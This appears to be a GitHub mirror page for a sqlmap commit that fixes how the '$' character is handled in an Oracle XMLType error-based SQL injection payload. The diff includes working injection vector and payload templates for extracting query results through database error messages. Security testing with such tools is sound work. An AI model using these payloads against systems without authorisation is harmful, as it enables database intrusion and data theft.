mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-28 20:43:49 +03:00
Oracle XML based error payload has problems with char $ as with space
This commit is contained in:
parent
1abcd507b8
commit
b5c9ccb755
|
@ -344,7 +344,7 @@ def checkSqlInjection(place, parameter, value):
|
|||
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
||||
|
||||
if output:
|
||||
result = output.replace(kb.misc.space, " ") == "1"
|
||||
result = output == "1"
|
||||
|
||||
if result:
|
||||
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
|
||||
|
|
|
@ -216,6 +216,7 @@ class Agent:
|
|||
payload = payload.replace("[DELIMITER_START]", kb.misc.start)
|
||||
payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop)
|
||||
payload = payload.replace("[SPACE_REPLACE]", kb.misc.space)
|
||||
payload = payload.replace("[DOLLAR_REPLACE]", kb.misc.dollar)
|
||||
payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
|
||||
|
||||
if origValue is not None:
|
||||
|
|
|
@ -1256,6 +1256,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
|
|||
kb.misc.start = ":%s:" % randomStr(length=3, lowercase=True)
|
||||
kb.misc.stop = ":%s:" % randomStr(length=3, lowercase=True)
|
||||
kb.misc.space = ":%s:" % randomStr(length=1, lowercase=True)
|
||||
kb.misc.dollar = ":%s:" % randomStr(length=1, lowercase=True)
|
||||
kb.misc.forcedDbms = None
|
||||
|
||||
if flushAll:
|
||||
|
|
|
@ -94,6 +94,8 @@ def __oneShotErrorUse(expression, field):
|
|||
retVal = output
|
||||
break
|
||||
|
||||
retVal = __errorReplaceChars(retVal)
|
||||
|
||||
dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(retVal)))
|
||||
|
||||
return retVal
|
||||
|
@ -134,13 +136,22 @@ def __errorFields(expression, expressionFields, expressionFieldsList, expected=N
|
|||
if isinstance(num, int):
|
||||
expression = origExpr
|
||||
|
||||
if output:
|
||||
output = output.replace(kb.misc.space, " ")
|
||||
|
||||
outputs.append(output)
|
||||
|
||||
return outputs
|
||||
|
||||
def __errorReplaceChars(value):
|
||||
"""
|
||||
Restores safely replaced characters
|
||||
"""
|
||||
|
||||
retVal = value
|
||||
|
||||
if value:
|
||||
retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$")
|
||||
|
||||
return retVal
|
||||
|
||||
def errorUse(expression, expected=None, resumeValue=True, dump=False):
|
||||
"""
|
||||
Retrieve the output of a SQL query taking advantage of the error-based
|
||||
|
|
|
@ -1055,9 +1055,9 @@ Formats:
|
|||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
||||
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
||||
<request>
|
||||
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
|
|
Loading…
Reference in New Issue
Block a user